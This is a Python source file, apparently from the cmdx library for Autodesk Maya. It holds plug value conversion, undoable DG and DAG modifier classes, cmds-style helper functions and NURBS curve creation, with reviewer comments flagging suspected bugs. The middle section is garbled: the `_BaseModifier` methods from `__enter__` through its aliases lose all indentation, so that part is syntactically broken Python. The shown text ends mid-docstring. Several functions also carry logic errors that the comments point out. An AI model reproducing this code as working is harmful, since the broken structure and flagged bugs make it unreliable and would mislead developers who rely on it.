def NurbsCurveData(points, degree=1, form=om1.MFnNurbsCurve.kOpen):
    """Tuple of points to MObject suitable for nurbsCurve-typed data
    Arguments:
        points (tuple): (x, y, z) tuples per point
        degree (int, optional): Defaults to 1 for linear
        form (int, optional): Defaults to MFnNurbsCurve.kOpen,
            also available kClosed
    Example:
        Create a new nurbs curve like this.
        >>> data = NurbsCurveData(
        ...     points=(
        ...         (0, 0, 0),
        ...         (0, 1, 0),
        ...         (0, 2, 0),
        ...     ))
        ...
        >>> parent = createNode("transform")
        >>> shape = createNode("nurbsCurve", parent=parent)
        >>> shape["cached"] = data
    """
    # Clamp degree into the supported 1-3 range
    degree = min(3, max(1, degree))

    cvs = om1.MPointArray()
    curveFn = om1.MFnNurbsCurve()
    data = om1.MFnNurbsCurveData()
    mobj = data.create()

    for point in points:
        cvs.append(om1.MPoint(*point))

    # Builds the curve directly into the data object `mobj`
    curveFn.createWithEditPoints(cvs,
                                 degree,
                                 form,
                                 False,
                                 False,
                                 True,
                                 mobj)
    return mobj
class CachedPlug(Plug):
    """Returned in place of an actual plug"""

    def __init__(self, value):
        # Deliberately does not call Plug.__init__; only
        # the cached value is stored.
        self._value = value

    def read(self, unit=None, time=None):
        """Return the cached value

        `unit` and `time` are accepted for signature compatibility
        with Plug.read but are ignored — the value was captured at
        cache time and cannot be re-evaluated. Previously read()
        took no arguments, so any caller passing unit/time to what
        it believed was a Plug would raise TypeError.
        """
        return self._value
def _plug_to_default(plug):
    """Find default value from plug, regardless of attribute type"""
    if plug.isArray:
        raise TypeError("Array plugs are unsupported")
    if plug.isCompound:
        raise TypeError("Compound plugs are unsupported")

    # Dispatch on the attribute's API type to the matching
    # function set, each of which exposes a `.default`
    attr = plug.attribute()
    type = attr.apiType()
    if type == om.MFn.kTypedAttribute:
        return om.MFnTypedAttribute(attr).default
    elif type in (om.MFn.kDoubleLinearAttribute,
                  om.MFn.kFloatLinearAttribute,
                  om.MFn.kDoubleAngleAttribute,
                  om.MFn.kFloatAngleAttribute):
        return om.MFnUnitAttribute(attr).default
    elif type == om.MFn.kNumericAttribute:
        return om.MFnNumericAttribute(attr).default
    elif type == om.MFn.kEnumAttribute:
        return om.MFnEnumAttribute(attr).default
    else:
        raise TypeError("Attribute type '%s' unsupported" % type)
def _plug_to_python(plug, unit=None, context=None):
    """Convert native `plug` to Python type
    Arguments:
        plug (om.MPlug): Native Maya plug
        unit (int, optional): Return value in this unit, e.g. Meters
        context (om.MDGContext, optional): Return value in this context
    """
    assert not plug.isNull, "'%s' was null" % plug

    kwargs = dict()
    if context is not None:
        kwargs["context"] = context

    # Multi attributes
    #   _____
    #  |     |
    #  |     ||
    #  |     ||
    #  |_____||
    #   |_____|
    #
    if plug.isArray and plug.isCompound:
        # E.g. locator["worldPosition"]
        # NOTE(review): only element 0 is returned for
        # array-of-compound plugs — confirm intended.
        return _plug_to_python(
            plug.elementByLogicalIndex(0), unit, context
        )
    elif plug.isArray:
        # E.g. transform["worldMatrix"][0]
        # E.g. locator["worldPosition"][0]
        return tuple(
            _plug_to_python(
                plug.elementByLogicalIndex(index),
                unit,
                context
            )
            for index in range(plug.evaluateNumElements())
        )
    elif plug.isCompound:
        return tuple(
            _plug_to_python(plug.child(index), unit, context)
            for index in range(plug.numChildren())
        )

    # Simple attributes
    #   _____
    #  |     |
    #  |     |
    #  |     |
    #  |_____|
    #
    attr = plug.attribute()
    type = attr.apiType()
    if type == om.MFn.kTypedAttribute:
        innerType = om.MFnTypedAttribute(attr).attrType()
        if innerType == om.MFnData.kAny:
            # E.g. choice["input"][0]
            return None
        elif innerType == om.MFnData.kMatrix:
            # E.g. transform["worldMatrix"][0]
            if plug.isArray:
                plug = plug.elementByLogicalIndex(0)
            return tuple(
                om.MFnMatrixData(plug.asMObject(**kwargs)).matrix()
            )
        elif innerType == om.MFnData.kString:
            return plug.asString(**kwargs)
        elif innerType == om.MFnData.kNurbsCurve:
            return om.MFnNurbsCurveData(plug.asMObject(**kwargs))
        elif innerType == om.MFnData.kComponentList:
            return None
        elif innerType == om.MFnData.kInvalid:
            # E.g. time1.timewarpIn_Hidden
            # Unsure of why some attributes are invalid
            return None
        else:
            log.debug("Unsupported kTypedAttribute: %s" % innerType)
            return None
    elif type == om.MFn.kMatrixAttribute:
        return tuple(om.MFnMatrixData(plug.asMObject(**kwargs)).matrix())
    elif type == om.MFnData.kDoubleArray:
        # NOTE(review): `type` is an om.MFn apiType but is compared
        # against an om.MFnData constant here — the enums differ, so
        # this branch may match the wrong type or never fire; confirm.
        raise TypeError("%s: kDoubleArray is not supported" % plug)
    elif type in (om.MFn.kDoubleLinearAttribute,
                  om.MFn.kFloatLinearAttribute):
        # Distances: default to centimeters, Maya's internal unit
        if unit is None:
            return plug.asMDistance(**kwargs).asUnits(Centimeters)
        elif unit == Millimeters:
            return plug.asMDistance(**kwargs).asMillimeters()
        elif unit == Centimeters:
            return plug.asMDistance(**kwargs).asCentimeters()
        elif unit == Meters:
            return plug.asMDistance(**kwargs).asMeters()
        elif unit == Kilometers:
            return plug.asMDistance(**kwargs).asKilometers()
        elif unit == Inches:
            return plug.asMDistance(**kwargs).asInches()
        elif unit == Feet:
            return plug.asMDistance(**kwargs).asFeet()
        elif unit == Miles:
            return plug.asMDistance(**kwargs).asMiles()
        elif unit == Yards:
            return plug.asMDistance(**kwargs).asYards()
        else:
            raise TypeError("Unsupported unit '%d'" % unit)
    elif type in (om.MFn.kDoubleAngleAttribute,
                  om.MFn.kFloatAngleAttribute):
        # Angles: default to radians, Maya's internal unit
        if unit is None:
            return plug.asMAngle(**kwargs).asUnits(Radians)
        elif unit == Degrees:
            return plug.asMAngle(**kwargs).asDegrees()
        elif unit == Radians:
            return plug.asMAngle(**kwargs).asRadians()
        elif unit == AngularSeconds:
            return plug.asMAngle(**kwargs).asAngSeconds()
        elif unit == AngularMinutes:
            return plug.asMAngle(**kwargs).asAngMinutes()
        else:
            raise TypeError("Unsupported unit '%d'" % unit)

    # Number
    elif type == om.MFn.kNumericAttribute:
        innerType = om.MFnNumericAttribute(attr).numericType()
        if innerType == om.MFnNumericData.kBoolean:
            return plug.asBool(**kwargs)
        elif innerType in (om.MFnNumericData.kShort,
                           om.MFnNumericData.kInt,
                           om.MFnNumericData.kLong,
                           om.MFnNumericData.kByte):
            return plug.asInt(**kwargs)
        elif innerType in (om.MFnNumericData.kFloat,
                           om.MFnNumericData.kDouble,
                           om.MFnNumericData.kAddr):
            return plug.asDouble(**kwargs)
        else:
            raise TypeError("Unsupported numeric type: %s"
                            % innerType)

    # Enum
    elif type == om.MFn.kEnumAttribute:
        return plug.asShort(**kwargs)
    elif type == om.MFn.kMessageAttribute:
        # In order to comply with `if plug:`
        return True
    elif type == om.MFn.kTimeAttribute:
        if unit:
            return plug.asMTime(**kwargs).asUnits(unit)
        else:
            return plug.asMTime(**kwargs).value
    elif type == om.MFn.kInvalid:
        raise TypeError("%s was invalid" % plug.name())
    else:
        raise TypeError("Unsupported type '%s'" % type)
def _python_to_plug(value, plug):
    """Pass value of `value` to `plug`
    Arguments:
        value (any): Instance of Python or Maya type
        plug (Plug): Target plug to which value is applied
    Raises:
        TypeError: On nested sequences or unsupported value types
    """
    # Compound values
    if isinstance(value, (tuple, list)):
        if plug.type() == "kMatrixAttribute":
            assert len(value) == 16, "Value didn't appear to be a valid matrix"
            return _python_to_plug(Matrix4(value), plug)

        for index, value in enumerate(value):
            # Tuple values are assumed flat:
            #   e.g. (0, 0, 0, 0)
            # Nested values are not supported:
            #   e.g. ((0, 0), (0, 0))
            # Those can sometimes appear in e.g. matrices
            if isinstance(value, (tuple, list)):
                raise TypeError(
                    "Unsupported nested Python type: %s"
                    % value.__class__
                )
            _python_to_plug(value, plug[index])

    # Native Maya types

    elif isinstance(value, om1.MObject):
        # API 1.0 data must be written through an API 1.0 plug
        node = _encode1(plug._node.path())
        shapeFn = om1.MFnDagNode(node)
        plug = shapeFn.findPlug(plug.name())
        plug.setMObject(value)

    elif isinstance(value, om.MEulerRotation):
        # Write each axis as an explicit radian angle
        for index, value in enumerate(value):
            value = om.MAngle(value, om.MAngle.kRadians)
            _python_to_plug(value, plug[index])

    elif isinstance(value, om.MAngle):
        plug._mplug.setMAngle(value)

    elif isinstance(value, om.MDistance):
        plug._mplug.setMDistance(value)

    elif isinstance(value, om.MTime):
        plug._mplug.setMTime(value)

    elif isinstance(value, om.MQuaternion):
        _python_to_plug(value.asEulerRotation(), plug)

    elif isinstance(value, om.MVector):
        for index, value in enumerate(value):
            _python_to_plug(value, plug[index])

    elif isinstance(value, om.MPoint):
        for index, value in enumerate(value):
            _python_to_plug(value, plug[index])

    elif isinstance(value, om.MMatrix):
        matrixData = om.MFnMatrixData()
        matobj = matrixData.create(value)
        plug._mplug.setMObject(matobj)

    elif plug._mplug.isCompound:
        # Fan a single value out to every child of the compound
        count = plug._mplug.numChildren()
        return _python_to_plug([value] * count, plug)

    # Native Python types
    elif isinstance(value, string_types):
        plug._mplug.setString(value)

    # Bug fix: bool must be tested before int — bool is a subclass
    # of int, so with the previous ordering True/False always took
    # the setInt branch and the setBool branch was unreachable.
    elif isinstance(value, bool):
        plug._mplug.setBool(value)

    elif isinstance(value, int):
        plug._mplug.setInt(value)

    elif isinstance(value, float):
        plug._mplug.setDouble(value)

    else:
        raise TypeError("Unsupported Python type '%s'" % value.__class__)
def _python_to_mod(value, plug, mod):
    """Convert `value` into a suitable equivalent for om.MDGModifier
    Arguments:
        value (object): Value of any type to write into modifier
        plug (Plug): Plug within which to write value
        mod (om.MDGModifier): Modifier to use for writing it
    Returns:
        bool: False when the value type was unsupported, else True
    """
    mplug = plug._mplug

    if isinstance(value, (tuple, list)):
        for index, value in enumerate(value):
            # Tuple values are assumed flat:
            #   e.g. (0, 0, 0, 0)
            # Nested values are not supported:
            #   e.g. ((0, 0), (0, 0))
            # Those can sometimes appear in e.g. matrices
            if isinstance(value, (tuple, list)):
                raise TypeError(
                    "Unsupported nested Python type: %s"
                    % value.__class__
                )
            _python_to_mod(value, plug[index], mod)

    elif isinstance(value, om.MVector):
        for index, value in enumerate(value):
            _python_to_mod(value, plug[index], mod)

    elif isinstance(value, string_types):
        mod.newPlugValueString(mplug, value)

    # Bug fix: bool must be tested before int — bool is a subclass
    # of int, so with the previous ordering True/False always took
    # the newPlugValueInt branch and newPlugValueBool was unreachable.
    elif isinstance(value, bool):
        mod.newPlugValueBool(mplug, value)

    elif isinstance(value, int):
        mod.newPlugValueInt(mplug, value)

    elif isinstance(value, float):
        # NOTE(review): _python_to_plug writes Python floats via
        # setDouble; newPlugValueFloat narrows to single precision —
        # confirm whether newPlugValueDouble was intended here.
        mod.newPlugValueFloat(mplug, value)

    elif isinstance(value, om.MAngle):
        mod.newPlugValueMAngle(mplug, value)

    elif isinstance(value, om.MDistance):
        mod.newPlugValueMDistance(mplug, value)

    elif isinstance(value, om.MTime):
        mod.newPlugValueMTime(mplug, value)

    elif isinstance(value, om.MEulerRotation):
        # Write each axis as an explicit radian angle
        for index, value in enumerate(value):
            value = om.MAngle(value, om.MAngle.kRadians)
            _python_to_mod(value, plug[index], mod)

    else:
        log.warning(
            "Unsupported plug type for modifier: %s" % type(value)
        )
        return False
    return True
def encode(path):
    """Convert relative or absolute `path` to cmdx Node
    Fastest conversion from absolute path to Node
    Arguments:
        path (str): Absolute or relative path to DAG or DG node
    Raises:
        ExistError: When `path` does not exist in the scene
    """
    assert isinstance(path, string_types), "%s was not string" % path

    selectionList = om.MSelectionList()
    try:
        selectionList.add(path)
    except RuntimeError:
        raise ExistError("'%s' does not exist" % path)

    mobj = selectionList.getDependNode(0)
    return Node(mobj)
def fromHash(code, default=None):
    """Get existing node from MObjectHandle.hashCode()"""
    try:
        return Singleton._instances["%x" % code]
    except KeyError:
        return default

def fromHex(hex, default=None, safe=True):
    """Get existing node from Node.hex"""
    node = Singleton._instances.get(hex, default)
    # NOTE(review): both branches below return `node`, so the
    # `safe`/`exists` check currently has no effect — confirm
    # whether the else-branch should return `default` instead.
    if safe and node and node.exists:
        return node
    else:
        return node
def toHash(mobj):
    """Cache the given `mobj` and return its hashCode
    This enables pre-caching of one or more nodes in situations where
    intend to access it later, at a more performance-critical moment.
    Ignores nodes that have already been cached.
    """
    node = Node(mobj)
    return node.hashCode

def toHex(mobj):
    """Cache the given `mobj` and return its hex value
    See :func:`toHash` for docstring.
    """
    node = Node(mobj)
    return node.hex

def asHash(mobj):
    """Return a given hashCode for `mobj`, without caching it
    This can be helpful in case you wish to synchronise `cmdx`
    with a third-party library or tool and wish to guarantee
    that an identical algorithm is used.
    """
    handle = om.MObjectHandle(mobj)
    return handle.hashCode()

def asHex(mobj):
    """Return a given hex string for `mobj`, without caching it
    See docstring for :func:`asHash` for details
    """
    return "%x" % asHash(mobj)
# Optional snake_case aliases for the helpers above
if ENABLE_PEP8:
    from_hash = fromHash
    from_hex = fromHex
    to_hash = toHash
    to_hex = toHex
    as_hash = asHash
    as_hex = asHex

# Helpful for euler rotations
degrees = math.degrees
radians = math.radians
sin = math.sin
cos = math.cos
tan = math.tan
pi = math.pi
def meters(cm):
    """Centimeters (Maya's default unit) to Meters
    Example:
        >>> meters(100)
        1.0
    """
    # 1 cm == 0.01 m; multiply to stay bit-identical with
    # the historical behaviour (division rounds differently)
    return cm * 0.01
def clear():
    """Remove all reused nodes"""
    # Drops every cached Node instance; subsequent lookups recreate them
    Singleton._instances.clear()
def _encode1(path):
    """Convert `path` to Maya API 1.0 MObject
    Arguments:
        path (str): Absolute or relative path to DAG or DG node
    Raises:
        ExistError on `path` not existing
    """
    selectionList = om1.MSelectionList()
    try:
        selectionList.add(path)
    except RuntimeError:
        raise ExistError("'%s' does not exist" % path)

    # API 1.0 fills a caller-provided MObject rather than returning one
    mobject = om1.MObject()
    selectionList.getDependNode(0, mobject)
    return mobject

def _encodedagpath1(path):
    """Convert `path` to Maya API 1.0 MObject
    Arguments:
        path (str): Absolute or relative path to DAG or DG node
    Raises:
        ExistError on `path` not existing
    """
    selectionList = om1.MSelectionList()
    try:
        selectionList.add(path)
    except RuntimeError:
        raise ExistError("'%s' does not exist" % path)

    # API 1.0 fills a caller-provided MDagPath rather than returning one
    dagpath = om1.MDagPath()
    selectionList.getDagPath(0, dagpath)
    return dagpath
def decode(node):
    """Convert cmdx Node to shortest unique path
    This is the same as `node.shortestPath()`
    To get an absolute path, use `node.path()`
    """
    try:
        return node.shortestPath()
    except AttributeError:
        # DG nodes have no path; fall back to the namespaced name
        return node.name(namespace=True)
def record_history(func):
    """Decorator: append (name, args, kwargs) to self._history before calling

    Arguments and keyword values are stored as strings (paths for
    Node/Plug, repr otherwise) rather than live objects.
    """
    @wraps(func)
    def decorator(self, *args, **kwargs):
        _kwargs = kwargs.copy()
        _args = list(args)

        # Don't store actual objects,
        # to facilitate garbage collection.
        for index, arg in enumerate(args):
            if isinstance(arg, (Node, Plug)):
                _args[index] = arg.path()
            else:
                _args[index] = repr(arg)

        for key, value in kwargs.items():
            if isinstance(value, (Node, Plug)):
                _kwargs[key] = value.path()
            else:
                _kwargs[key] = repr(value)

        self._history.append((func.__name__, _args, _kwargs))
        return func(self, *args, **kwargs)
    return decorator
class _BaseModifier(object):
    """Interactively edit an existing scenegraph with support for undo/redo
    Arguments:
        undoable (bool, optional): Put undoIt on the undo queue
        interesting (bool, optional): New nodes should appear
            in the channelbox
        debug (bool, optional): Include additional debug data,
            at the expense of performance
        atomic (bool, optional): Automatically rollback changes on failure
        template (str, optional): Automatically name new nodes using
            this template
    """

    # The native modifier this class wraps; subclasses may override
    # (e.g. with om.MDagModifier)
    Type = om.MDGModifier
def __enter__(self):
self.isContext = True
return self
def __exit__(self, exc_type, exc_value, tb):
# Support calling `doIt` during a context,
# without polluting the undo queue.
if self.isContext and self._opts["undoable"]:
commit(self._modifier.undoIt, self._modifier.doIt)
self.doIt()
def __init__(self,
undoable=True,
interesting=True,
debug=True,
atomic=True,
template=None):
super(_BaseModifier, self).__init__()
self.isDone = False
self.isContext = False
self._modifier = self.Type()
self._history = list()
self._index = 1
self._opts = {
"undoable": undoable,
"interesting": interesting,
"debug": debug,
"atomic": atomic,
"template": template,
}
def doIt(self):
if (not self.isContext) and self._opts["undoable"]:
commit(self._modifier.undoIt, self._modifier.doIt)
try:
self._modifier.doIt()
except RuntimeError:
# Rollback changes
if self._opts["atomic"]:
self.undoIt()
raise ModifierError(self._history)
self.isDone = True
def undoIt(self):
self._modifier.undoIt()
@record_history
def createNode(self, type, name=None):
try:
mobj = self._modifier.createNode(type)
except TypeError:
raise TypeError("'%s' is not a valid node type" % type)
template = self._opts["template"]
if name or template:
name = (template or "{name}").format(
name=name or "",
type=type,
index=self._index,
)
self._modifier.renameNode(mobj, name)
node = Node(mobj, exists=False, modifier=self)
if not self._opts["interesting"]:
plug = node["isHistoricallyInteresting"]
_python_to_mod(False, plug, self._modifier)
self._index += 1
return node
@record_history
def deleteNode(self, node):
return self._modifier.deleteNode(node._mobject)
delete = deleteNode
@record_history
def renameNode(self, node, name):
return self._modifier.renameNode(node._mobject, name)
rename = renameNode
@record_history
def setAttr(self, plug, value):
if isinstance(value, Plug):
value = value.read()
if isinstance(plug, om.MPlug):
value = Plug(plug.node(), plug).read()
_python_to_mod(value, plug, self._modifier)
def resetAttr(self, plug):
self.setAttr(plug, plug.default)
@record_history
def connect(self, src, dst, force=True):
if isinstance(src, Plug):
src = src._mplug
if isinstance(dst, Plug):
dst = dst._mplug
if force:
# Disconnect any plug connected to `other`
for plug in dst.connectedTo(True, False):
self.disconnect(plug, dst)
self._modifier.connect(src, dst)
@record_history
def disconnect(self, a, b=None, source=True, destination=True):
"""Disconnect `a` from `b`
Arguments:
a (Plug): Starting point of a connection
b (Plug, optional): End point of a connection, defaults to all
source (bool, optional): Disconnect b, if it is a source
source (bool, optional): Disconnect b, if it is a destination
Normally, Maya only performs a disconnect if the
connection is incoming. Bidirectional
disconnect(A, B) => OK
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
disconnect(B, A) => NO
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
"""
if isinstance(a, Plug):
a = a._mplug
if isinstance(b, Plug):
b = b._mplug
if b is None:
# Disconnect any plug connected to `other`
if source:
for plug in a.connectedTo(True, False):
self._modifier.disconnect(plug, a)
if destination:
for plug in a.connectedTo(False, True):
self._modifier.disconnect(a, plug)
else:
if source:
self._modifier.disconnect(a, b)
if destination:
self._modifier.disconnect(b, a)
if ENABLE_PEP8:
do_it = doIt
undo_it = undoIt
create_node = createNode
delete_node = deleteNode
rename_node = renameNode
set_attr = setAttr
reset_attr = resetAttr
class DGModifier(_BaseModifier):
    """Modifier for DG nodes"""

    # DG-only modifier; DAG operations (parenting) live on DagModifier
    Type = om.MDGModifier
class DagModifier(_BaseModifier):
    """Modifier for DAG nodes

    Example:
        >>> with DagModifier() as mod:
        ...     node1 = mod.createNode("transform")
        ...     node2 = mod.createNode("transform", parent=node1)
        ...     mod.setAttr(node1["translate"], (1, 2, 3))
        ...     mod.connect(node1 + ".translate", node2 + ".translate")
        ...
        >>> getAttr(node1 + ".translateX")
        1.0
        >>> node2["translate"][0]
        1.0
        >>> node2["translate"][1]
        2.0
        >>> with DagModifier() as mod:
        ...     node1 = mod.createNode("transform")
        ...     node2 = mod.createNode("transform", parent=node1)
        ...     node1["translate"] = (5, 6, 7)
        ...     node1["translate"] >> node2["translate"]
        ...
        >>> node2["translate"][0]
        5.0
        >>> node2["translate"][1]
        6.0

    Example, without context manager:
        >>> mod = DagModifier()
        >>> parent = mod.createNode("transform")
        >>> shape = mod.createNode("transform", parent=parent)
        >>> mod.connect(parent["tz"], shape["tz"])
        >>> mod.setAttr(parent["sx"], 2.0)
        >>> parent["tx"] >> shape["ty"]
        >>> parent["tx"] = 5.1
        >>> round(shape["ty"], 1)  # Not yet created nor connected
        0.0
        >>> mod.doIt()
        >>> round(shape["ty"], 1)
        5.1
        >>> round(parent["sx"])
        2.0

    Duplicate names are resolved, even though nodes haven't yet been created:
        >>> _ = cmds.file(new=True, force=True)
        >>> with DagModifier() as mod:
        ...     node = mod.createNode("transform", name="NotUnique")
        ...     node1 = mod.createNode("transform", name="NotUnique")
        ...     node2 = mod.createNode("transform", name="NotUnique")
        ...
        >>> node.name() == "NotUnique"
        True
        >>> node1.name() == "NotUnique1"
        True
        >>> node2.name() == "NotUnique2"
        True

    Deletion works too
        >>> _ = cmds.file(new=True, force=True)
        >>> mod = DagModifier()
        >>> parent = mod.createNode("transform", name="myParent")
        >>> child = mod.createNode("transform", name="myChild", parent=parent)
        >>> mod.doIt()
        >>> "myParent" in cmds.ls()
        True
        >>> "myChild" in cmds.ls()
        True
        >>> parent.child().name()
        u'myChild'
        >>> mod = DagModifier()
        >>> _ = mod.delete(child)
        >>> mod.doIt()
        >>> parent.child() is None
        True
        >>> "myChild" in cmds.ls()
        False

    """

    Type = om.MDagModifier

    @record_history
    def createNode(self, type, name=None, parent=None):
        # A null MObject parents the new node to the world
        parent = parent._mobject if parent else om.MObject.kNullObj

        try:
            mobj = self._modifier.createNode(type, parent)
        except TypeError:
            raise TypeError("'%s' is not a valid node type" % type)

        template = self._opts["template"]
        if name or template:
            name = (template or "{name}").format(
                name=name or "",
                type=type,
                index=self._index,
            )
            self._modifier.renameNode(mobj, name)

        return DagNode(mobj, exists=False, modifier=self)

    @record_history
    def parent(self, node, parent=None):
        # NOTE(review): unlike createNode above, a missing parent is
        # passed as None rather than om.MObject.kNullObj -- confirm
        # reparentNode accepts None for "parent to world"
        parent = parent._mobject if parent is not None else None
        self._modifier.reparentNode(node._mobject, parent)

    if ENABLE_PEP8:
        create_node = createNode
class DGContext(om.MDGContext):
    def __init__(self, time=None):
        """Context for evaluating the Maya DG

        Extension of MDGContext to also accept time as a float. In Maya 2018
        and above DGContext can also be used as a context manager.

        Arguments:
            time (float, om.MTime, optional): Time at which to evaluate context

        """
        args = []

        if time is not None:
            # Plain numbers are interpreted in the current UI unit
            if isinstance(time, (int, float)):
                time = om.MTime(time, om.MTime.uiUnit())
            args.append(time)

        super(DGContext, self).__init__(*args)
        self._previousContext = None

    def __enter__(self):
        if __maya_version__ < 2018:
            cmds.error(
                "'%s' does not support context manager functionality for Maya 2017 "
                "and below" % self.__class__.__name__
            )
        else:
            self._previousContext = self.makeCurrent()
            return self

    def __exit__(self, exc_type, exc_value, tb):
        previous = self._previousContext
        if previous:
            previous.makeCurrent()
# Alias for DGContext
Context = DGContext
def ls(*args, **kwargs):
    """Return the result of `cmds.ls` as cmdx instances

    Arguments are forwarded verbatim to `cmds.ls`.

    Returns:
        list: Encoded nodes. A list (rather than the lazy, one-shot
            `map` object previously returned under Python 3) so the
            result can be indexed and iterated more than once.

    """
    return list(map(encode, cmds.ls(*args, **kwargs)))
def selection(*args, **kwargs):
    """Return the active selection as cmdx instances

    Arguments are forwarded to `cmds.ls`, with `selection=True` added.

    Returns:
        list: Encoded nodes. A list (rather than the lazy, one-shot
            `map` object previously returned under Python 3).

    """
    return list(map(encode, cmds.ls(*args, selection=True, **kwargs)))
def createNode(type, name=None, parent=None):
    """Create a new node

    This function forms the basic building block
    with which to create new nodes in Maya.

    .. note:: Missing arguments `shared` and `skipSelect`
    .. tip:: For additional performance, `type` may be given as an MTypeId

    Arguments:
        type (str): Type name of new node, e.g. "transform"
        name (str, optional): Sets the name of the newly-created node
        parent (Node, optional): Specifies the parent in the DAG under which
            the new node belongs

    Example:
        >>> node = createNode("transform")  # Type as string
        >>> node = createNode(tTransform)  # Type as ID

    """
    try:
        with DagModifier() as mod:
            node = mod.createNode(type, name=name, parent=parent)
    except TypeError:
        # Non-DAG types raise TypeError from DagModifier;
        # fall back to the plain DG modifier (no parent support)
        with DGModifier() as mod:
            node = mod.createNode(type, name=name)

    return node
def getAttr(attr, type=None, time=None):
    """Read `attr`

    Arguments:
        attr (Plug): Attribute as a cmdx.Plug
        type (str, optional): Unused; kept for signature
            compatibility with `cmds.getAttr`
        time (float, optional): Time at which to evaluate the attribute

    Example:
        >>> node = createNode("transform")
        >>> getAttr(node + ".translateX")
        0.0

    """
    return attr.read(time=time)
def setAttr(attr, value, type=None):
    """Write `value` to `attr`

    Arguments:
        attr (Plug): Existing attribute to edit
        value (any): Value to write
        type (int, optional): Unused; kept for signature
            compatibility with `cmds.setAttr`

    Example:
        >>> node = createNode("transform")
        >>> setAttr(node + ".translateX", 5.0)

    """
    attr.write(value)
def addAttr(node,
            longName,
            attributeType,
            shortName=None,
            enumName=None,
            defaultValue=None):
    """Add new attribute to `node`

    Arguments:
        node (Node): Add attribute to this node
        longName (str): Name of resulting attribute
        attributeType (str): Type of attribute, e.g. `string`
        shortName (str, optional): Alternate name of attribute
            NOTE(review): currently unused
        enumName (str, optional): Options for an enum attribute
        defaultValue (any, optional): Default value of attribute

    Example:
        >>> node = createNode("transform")
        >>> addAttr(node, "myString", attributeType="string")
        >>> addAttr(node, "myDouble", attributeType=Double)

    """
    at = attributeType
    if isinstance(at, type) and issubclass(at, _AbstractAttribute):
        Attribute = attributeType

    else:
        # Support legacy maya.cmds interface
        Attribute = {
            "double": Double,
            "double3": Double3,
            "string": String,
            "long": Long,
            "bool": Boolean,

            # BUGFIX: `cmds.addAttr` spells this "enum"; the
            # misspelt "enume" key is kept for backwards compatibility
            "enum": Enum,
            "enume": Enum,
        }[attributeType]

    kwargs = {
        "default": defaultValue
    }

    if enumName:
        kwargs["fields"] = enumName.split(":")

    attribute = Attribute(longName, **kwargs)
    node.addAttr(attribute)
def listRelatives(node,
                  type=None,
                  children=False,
                  allDescendents=False,
                  parent=False,
                  shapes=False):
    """List relatives of `node`

    Arguments:
        node (DagNode): Node to enquire about
        type (int, optional): Only return nodes of this type
        children (bool, optional): Return children of `node`
        parent (bool, optional): Return parent of `node`
        shapes (bool, optional): Return only children that are shapes
        allDescendents (bool, optional): Return descendents of `node`

    Example:
        >>> parent = createNode("transform")
        >>> child = createNode("transform", parent=parent)
        >>> listRelatives(child, parent=True) == [parent]
        True

    """
    # Only DAG nodes have relatives
    if not isinstance(node, DagNode):
        return None

    # First truthy flag wins, in this order of precedence;
    # with no flag set, None is returned
    if allDescendents:
        return list(node.descendents(type=type))

    if shapes:
        return list(node.shapes(type=type))

    if parent:
        return [node.parent(type=type)]

    if children:
        return list(node.children(type=type))
def listConnections(attr):
    """List connections of `attr`

    Arguments:
        attr (Plug or Node):

    Example:
        >>> node1 = createNode("transform")
        >>> node2 = createNode("mesh", parent=node1)
        >>> node1["v"] >> node2["v"]
        >>> listConnections(node1) == [node2]
        True
        >>> listConnections(node1 + ".v") == [node2]
        True
        >>> listConnections(node1["v"]) == [node2]
        True
        >>> listConnections(node2) == [node1]
        True

    """
    # connections() yields lazily; materialise it for the caller
    return list(attr.connections())
def connectAttr(src, dst):
    """Connect `src` to `dst`

    Arguments:
        src (Plug): Source plug
        dst (Plug): Destination plug

    Example:
        >>> src = createNode("transform")
        >>> dst = createNode("transform")
        >>> connectAttr(src + ".rotateX", dst + ".scaleY")

    """
    src.connect(dst)
def delete(*nodes):
    """Delete one or more `nodes` in a single, undoable operation"""
    with DGModifier() as mod:
        for node in nodes:
            mod.delete(node)
def rename(node, name):
    """Rename `node` to `name`, undoably"""
    with DGModifier() as mod:
        mod.rename(node, name)
def parent(children, parent, relative=True, absolute=False):
    """Parent one or more `children` under `parent`

    NOTE(review): `relative` and `absolute` are currently unused;
    kept for signature compatibility with `cmds.parent`

    """
    assert isinstance(parent, DagNode), "parent must be DagNode"

    # Tolerate a single child passed directly
    if not isinstance(children, (tuple, list)):
        children = [children]

    for child in children:
        assert isinstance(child, DagNode), "child must be DagNode"
        parent.addChild(child)
def objExists(obj):
    """Return whether `obj` (a path, Node or Plug) exists in the scene"""
    if isinstance(obj, (Node, Plug)):
        obj = obj.path()

    try:
        # MSelectionList.add raises on anything that doesn't exist
        om.MSelectionList().add(obj)
    except RuntimeError:
        return False

    return True
# PEP08
# snake_case aliases of the camelCase functions above
sl = selection
create_node = createNode
get_attr = getAttr
set_attr = setAttr
add_attr = addAttr
list_relatives = listRelatives
list_connections = listConnections
connect_attr = connectAttr
obj_exists = objExists
# Speciality functions

# NURBS curve "form" constants, from the API 1.0 function set
kOpen = om1.MFnNurbsCurve.kOpen
kClosed = om1.MFnNurbsCurve.kClosed
kPeriodic = om1.MFnNurbsCurve.kPeriodic
def editCurve(parent, points, degree=1, form=kOpen):
    """Create a NURBS curve shape from edit (interpolation) points

    Arguments:
        parent (DagNode): Parent to resulting shape node
        points (list): One tuple per point, with 3 floats each
        degree (int, optional): Degree of curve, clamped to 1-3
        form (int, optional): One of kOpen, kClosed, kPeriodic

    """
    assert isinstance(parent, DagNode), (
        "parent must be of type cmdx.DagNode"
    )

    # MFnNurbsCurve supports degrees 1 through 3 only
    degree = min(3, max(1, degree))

    cvs = om1.MPointArray()
    curveFn = om1.MFnNurbsCurve()

    for point in points:
        cvs.append(om1.MPoint(*point))

    mobj = curveFn.createWithEditPoints(cvs,
                                        degree,
                                        form,
                                        False,
                                        False,
                                        True,
                                        _encode1(parent.path()))

    mod = om1.MDagModifier()
    mod.renameNode(mobj, parent.name(namespace=True) + "Shape")
    mod.doIt()

    def undo():
        mod.deleteNode(mobj)
        mod.doIt()

    def redo():
        # NOTE(review): this undoes the deletion performed by
        # `undo` above, rather than re-running creation -- confirm
        mod.undoIt()

    commit(undo, redo)

    shapeFn = om1.MFnDagNode(mobj)
    return encode(shapeFn.fullPathName())
def curve(parent, points, degree=1, form=kOpen):
    """Create a NURBS curve from a series of points

    Arguments:
        parent (DagNode): Parent to resulting shape node
        points (list): One tuple per point, with 3 floats each
        degree (int, optional): Degree of curve, 1 is linear
